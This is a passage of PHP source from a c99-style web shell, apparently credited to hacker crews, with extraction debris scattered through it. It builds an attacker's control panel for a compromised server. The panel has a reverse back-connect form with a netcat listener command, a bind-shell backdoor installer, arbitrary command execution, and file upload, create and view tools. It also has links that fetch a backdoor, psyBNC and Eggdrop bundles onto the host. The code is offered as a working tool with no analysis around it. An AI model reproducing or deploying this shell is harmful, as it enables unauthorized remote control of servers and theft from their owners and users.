    header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
    header("Cache-control: max-age=".(60*60*24*7));
    header("Last-Modified: ".date("r",filemtime(__FILE__)));
    foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
    if (empty($images[$img])) {$img = "small_unk";}
    if (in_array($img,$ext_tar)) {$img = "ext_tar";}
    echo base64_decode($images[$img]);
}
else {
    foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d]))
{echo("Warning! Remove \ $images[".$d."]<br>");}}}
    natsort($images);
    $k = array_keys($images);
    echo "<center>";
    foreach ($k as $u) {echo $u."<img src=\"\".$surl.\"act=img&img=\".$u.\"\" border=\"1\"><br>";}
    echo "</center>";
}
exit;
}
if ($act == "about") {
    echo "<center><b>Credits:</b><br>Idea, leading and coding by <b>edancrew</b><br>Beta-
testing and some tips by <b>NukLeoN [AnTiSh@Re tEaM]</b><br>Re-Coding, tricks, and css
by <b>FaTaLisTiCz_yx [FeeLCoMz CoMMuNiTy]</b><br><br> Thanks all who report
bugs<br>Please report bugs to <a href=\"mailto:asyiek12@gmail.com\">FaTaLisTiCz_yx</a>
</b>";
}
if ($act == "backc") {

```

```

$ip = $_SERVER["REMOTE_ADDR"];
$msg = $_POST['backconnmsg'];
$msg = $_POST['backconnmsge'];
echo("<center><b>Back-Connection:</b></br></br><form name=form method=POST>Host:
<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text
name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option
value=Perl>Perl</option><option value=C>C</option></select> <input type=submit
name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once
open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br></center>");
echo("$msg");
echo("$msg");
}
if ($act == "shbd"){
$msg = $_POST['backconnmsg'];
$msg = $_POST['backconnmsge'];
echo("<center><b>Bind Shell Backdoor:</b><br><br><form name=form method=POST>
Bind Port: <input type='text' name='backconnectport' value='5992'>
<input type='hidden' name='use' value='shbd'>
<input type='submit' value='Install Backdoor'></form>");
echo("$msg");
echo("$msg");
echo("</center>");
}
echo "</td></tr></table>\n";
//COMMANDS PANEL
?>
<div ><b>.: COMMANDS PANEL :.</b></div>
<table>
<?php
if (!$safemode) {
?>
<tr><td align=right>Command:</td>
<td><form method="POST">
<input type=hidden name=act value="cmd">
<input type=hidden name="d" value="<?php echo $dispd; ?>">
<input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>">
<input type=hidden name="cmd_txt" value="1"> - <input type=submit name=submit
value="Execute">
</form>

```

```
</td></tr>
```

```
<tr><td align=right>Quick Commands:</td>
```

```
<td><form method="POST">
```

```
  <input type=hidden name=act value="cmd">
```

```
  <input type=hidden name="d" value="<?php echo $dispd; ?>">
```

```
  <input type=hidden name="cmd_txt" value="1">
```

```
  <select name="cmd">
```

```
  <?php
```

```
  foreach ($cmdaliases as $als) {
```

```
    echo "<option value=\"\".htmlspecialchars($als[1]).\"\">".htmlspecialchars($als[0])."
</option>";
```

```
  }
```

```
  foreach ($cmdaliases2 as $als) {
```

```
    echo "<option value=\"\".htmlspecialchars($als[1]).\"\">".htmlspecialchars($als[0])."
</option>";
```

```
  }
```

```
  ?>
```

```
</select> -
```

```
  <input type=submit name=submit value="Execute">
```

```
</form>
```

```
</td></tr>
```

```
<?php
```

```
}
```

```
?>
```

```
<tr><td align=right>Kernel Info:</td>
```

```
<td><form method="post" action="http://google.com/search">
```

```
  <input type="hidden" name="client" value="firefox-a">
```

```
  <input type="hidden" name="rls" value="org.mozilla:en-US:official">
```

```
  <input type="hidden" name="hl" value="en">
```

```
  <input type="hidden" name="hs" value="b7p">
```

```
  <input name="q" type="text" id="q" size="80" value="<?php echo wordwrap(php_uname());
?>"> -
```

```
  <input type=submit name="btnG" VALUE="Search">
```

```
</form>
```

```
</td></tr>
```

```
<tr><td align=right>Upload:</td>
```

```
<td><form method="POST" enctype="multipart/form-data">
```

```
  <input type=hidden name=act value="upload">
```

```
  <input type=hidden name="miniform" value="1">
```

```

 - 
<?php echo $wdt; ?>
</form>
</td></tr>
<?php /* FaTaLiSTiCz_yx TriCkz */ ?>
<script language="javascript">
function set_arg(txt1,txt2) {
    document.forms.fphpfsys.arg1.value = txt1;
    document.forms.fphpfsys.arg2.value = txt2;
}
</script>
<tr><td align=right>PHP Filesystem:</td>
<td><form name="fphpfsys" method="POST"><input type=hidden name=act
value="phpfsys"><input type=hidden name="d" value="<?php echo $dispd; ?>">
    <select name="phpfsysfunc">
        <?php
        foreach ($phpfsaliases as $sals) {
            if ($sals[1]==$phpfsysfunc) { echo "<option selected value=\"\".\"$sals[1].\">\".\"$sals[0].\"
</option>"; }
            else { echo "<option value=\"\".\"$sals[1].\">\".\"$sals[0].\"</option>"; }
        }
        ?>
    </select>
    File/Dir/URL: <input type="text" name="arg1" id="a1" size="40" value="<?php echo
htmlspecialchars($arg1); ?>">
    To/Max: <input type="text" name="arg2" size="50" value="<?php echo
htmlspecialchars($arg2); ?>">
    <input type=submit name=submit value="Execute"><hr noshade size=1>
    <a href=" ononclick="set_arg('<?php echo $sh_mainurl."pass.txt"; ?>', 'ipays.php')">[BackDor]
</a>
    <a href=" ononclick="set_arg('<?php echo $sh_mainurl."psy.tar.gz"; ?>', 'psy.tar.gz')">[psyBNC]
</a>
    <a href=" ononclick="set_arg('<?php echo $sh_mainurl."httpd.tar.gz"; ?>', 'httpd.tar.gz')">
[Eggdrop]</a>
    </form>
</td></tr>
<tr><td align=right>Search:</td>
<td><form method="POST"><input type=hidden name=act value="search"><input
type=hidden name="d" value="<?php echo $dispd; ?>">

```

```
<input type="text" name="search_name" size="29" value="(.)">&nbsp;  <input
type="checkbox" name="search_name_regexp" value="1" checked> - regexp&nbsp;  
<input type="submit" name="submit" value="Search">
</form>
</td></tr>
<tr><td align="right">Make File:</td>
<td><form method="POST"><input type="hidden" name="act" value="mkfile"><input type="hidden
name="d" value="<?php echo $dispd; ?>"><input type="hidden" name="ft" value="edit">
<input type="text" name="mkfile" size="70" value="<?php echo $dispd; ?>"> - <input
type="submit" value="Create"> <?php echo $wdt; ?>
</form></td></tr>
<tr><td align="right">View File:</td>
<td><form method="POST"><input type="hidden" name="act" value="gofile"><input type="hidden
name="d" value="<?php echo $dispd; ?>">
<input type="text" name="f" size="70" value="<?php echo $dispd; ?>"> - <input
type="submit" value="View">
</form></td></tr>
</table>
<div colspan=2><font color=yellow>.: [ Re-Coding by alay | #ronie #alay @ jatimcrew |
Generated: <?php echo round(getmicrotime()-starttime,4); ?> seconds ]:.</font></div>
</body></html>
<?php chdir($lastdir); c99shexit(); ?>
```